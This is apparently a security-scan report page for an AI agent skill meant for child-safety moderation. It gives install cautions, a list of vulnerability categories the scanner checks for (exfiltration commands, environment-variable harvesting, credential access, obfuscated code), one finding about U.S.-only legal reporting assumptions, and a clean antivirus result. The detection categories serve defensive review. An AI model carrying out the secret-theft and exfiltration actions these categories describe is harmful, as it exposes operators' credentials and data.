Csam Shield

Security checks across malware telemetry and agentic risk

Overview

This is a legitimate child-safety skill, but it gives agents broad automatic reporting, enforcement, monitoring, and evidence-retention authority that needs human and legal review before use.

Install only if you are an authorized platform safety or legal operator. Independently review the npm package and dependencies, pin verified versions, scope reporting credentials, require jurisdiction-specific legal approval, add human-review gates where legally appropriate, minimize evidence retention, and document appeal or rollback handling for mistaken enforcement.

SkillSpector

By NVIDIA

Vulnerability Patterns

Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep

Findings (1)

Natural-Language Policy Violations

Medium

Confidence: 95% confidence
Finding: The skill hard-codes U.S.-centric reporting and legal obligations (for example mandatory NCMEC reporting under 18 USC § 2258A) as if they universally apply, without requiring jurisdiction selection or clarifying regional applicability. In a safety-critical moderation workflow, this can cause unlawful or inappropriate disclosure, incorrect escalation paths, and compliance failures for operators outside the intended legal regime.

VirusTotal

66/66 vendors flagged this skill as clean.

View on VirusTotal